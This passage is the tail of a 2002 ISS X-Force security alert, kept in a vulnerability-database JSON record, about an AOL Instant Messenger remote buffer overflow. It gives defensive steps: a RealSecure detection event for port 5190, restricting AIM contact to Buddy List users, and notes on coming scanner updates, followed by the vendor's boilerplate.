Choose the policy that you want to use, and then click 'Customize'.\r\n2. Select the 'Connection Events' tab.\r\n3. In the right pane, click 'Add'.\r\n4. Create a Connection Event.\r\n5. Type in a name of the event, such as 'AIM_5190'.\r\n6. In the 'Response' field for the event, select the responses you want\r\n to use.\r\n In the 'Protocol' field, select TCP.\r\n In the 'Src Port/Type' field, select the entry for AOL port 5190.\r\n Click 'OK'.\r\n7. Save the changes, and then close the window.\r\n8. Click 'Apply to Sensor' or 'Apply to Engine' depending on the version\r\n of RealSecure you are using.\r\n\r\nTo reduce the risk from this vulnerability until a fixed version is\r\navailable, AOL Instant Messenger users should block unknown users from\r\ncontacting them using AIM. However, this will not provide complete\r\nprotection, because users on your Buddy List can still contact you. If\r\nthis vulnerability is built into a worm, this attack may come from users\r\non your Buddy List without their knowledge.\r\n\r\nTo block unknown users in AIM:\r\n1. Go to My AIM -> Edit Options -> Edit Preferences.\r\n2. In the left pane, select the Privacy category.\r\n3. In the "Who can contact me" section, select "Allow only users on my\r\n Buddy List".\r\n\r\nInternet Scanner X-Press Update version 6.4 will be available for\r\ndownload at the following URL on January 3, 2002:\r\nhttp://www.iss.net/db_data/xpu/IS.php\r\n\r\nISS X-Force will provide detection support for this vulnerability in an\r\nupcoming X-Press Updates for RealSecure Network Sensor. 
Detection\r\nsupport for this attack will also be added in a future update for\r\nBlackICE products.\r\n\r\nAdditional Information:\r\n\r\nThis vulnerability was discovered and released by w00w00.\r\n\r\n______\r\n\r\n\r\nAbout Internet Security Systems (ISS)\r\nInternet Security Systems is a leading global provider of security\r\nmanagement solutions for the Internet, protecting digital assets and\r\nensuring safe and uninterrupted e-business. With its industry-leading\r\nintrusion detection and vulnerability assessment, remote managed\r\nsecurity services, and strategic consulting and education offerings, ISS\r\nis a trusted security provider to more than 9,000 customers worldwide\r\nincluding 21 of the 25 largest U.S. commercial banks, the top 10 U.S.\r\ntelecommunications companies, and all major branches of the U.S. Federal\r\nGovernment. Founded in 1994, ISS is headquartered in Atlanta, GA, with\r\nadditional offices throughout North America and international operations\r\nin Asia, Australia, Europe, Latin America and the Middle East. For more\r\ninformation, visit the Internet Security Systems web site at www.iss.net\r\nor call 888-901-7477.\r\n\r\nCopyright (c) 2001 Internet Security Systems, Inc. All rights reserved\r\nworldwide.\r\n\r\nPermission is hereby granted for the redistribution of this Alert\r\nelectronically. It is not to be edited in any way without express\r\nconsent of the X-Force. If you wish to reprint the whole or any part\r\nof this Alert in any other medium excluding electronic medium, please\r\ne-mail xforce@iss.net for permission.\r\n\r\nDisclaimer\r\n\r\nThe information within this paper may change without notice. Use of\r\nthis information constitutes acceptance for use in an AS IS condition.\r\nThere are NO warranties with regard to this information. In no event\r\nshall the author be liable for any damages whatsoever arising out of or\r\nin connection with the use or spread of this information. 
Any use of\r\nthis information is at the user's own risk.\r\n\r\nX-Force PGP Key available at: http://xforce.iss.net/sensitive.php\r\nas well as on MIT's PGP key server and PGP.com's key server.\r\n\r\nX-Force Vulnerability and Threat Database: http://www.iss.net/xforce\r\n\r\nPlease send suggestions, updates, and comments to:\r\nX-Force xforce@iss.net of Internet Security Systems, Inc.\r\n", "modified": "2002-01-03T00:00:00", "published": "2002-01-03T00:00:00", "id": "SECURITYVULNS:DOC:2309", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:2309", "title": "ISS Security Alert: AOL Instant Messenger Remote Buffer Overflow", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}